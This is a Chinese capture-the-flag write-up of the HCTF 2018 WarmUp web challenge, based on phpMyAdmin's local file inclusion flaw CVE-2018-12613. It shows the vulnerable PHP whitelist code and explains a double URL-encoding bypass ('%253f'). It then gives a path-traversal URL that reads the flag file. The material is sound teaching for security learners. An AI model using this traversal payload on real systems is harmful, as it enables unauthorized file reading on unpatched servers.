HCTF|HCTF 2018-WEB-WarmUp
复现地址
https://buuoj.cn/challenges#[HCTF%202018]WarmUp
- 本题考察的是phpMyAdmin 4.8.x before 4.8.2 本地文件包含
- 漏洞编号 CVE-2018-12613 [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12613]
"source.php","hint"=>"hint.php"];
if (! isset($page) || !is_string($page)) {
echo "you can't see it";
return false;
}if (in_array($page, $whitelist)) {
return true;
}$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}$_page = urldecode($page);
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}if (! empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'])
) {
include $_REQUEST['file'];
exit;
} else {
echo "
文章图片
page,不可用,第三个语句截取'?'前部分,由于?被后部分被解析为get方式提交的参数,也不可利用第四个if语句中,先进行url解码再截取,因此我们可以将?经过两次url编码,在服务器端提取参数时解码一次,checkFile函数中解码一次,仍会解码为'?',仍可通过第四个if语句校验。('?'两次编码值为'%253f'),构造url
http://****/source.php?file=source.php%3f25../../../../../../ffffllllaaaagggg
读取到flag。
推荐阅读
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- s2-045漏洞的复现及其修复
- 《宁静心态(不断复现知识整体》——宁静致远|《宁静心态:不断复现知识整体》——宁静致远 20200111-今日复盘-401-348)
- 日本京都动画工作室大火已致33人死亡,致我们那些逝去的优秀人才与不可复现的动画!
- IIS中间件复现
- Nginx -系列漏洞复现
- 2019CISCN|2019CISCN web题赛-JustSoSo;love_math(复现)
- 利用Vulnhub复现漏洞 - JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)
- ctf|hctf[pwn]babyprintf_ver2
- #|FCOS: Fully Convolutional One-Stage Object Detection(ICCV2019)代码复现
- 漏洞复现——apache文件解析漏洞